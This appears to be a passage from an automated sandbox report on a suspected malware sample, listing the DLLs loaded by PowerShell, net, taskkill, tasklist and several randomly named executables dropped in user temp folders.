                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: pdh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: cryptnet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: perfos.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
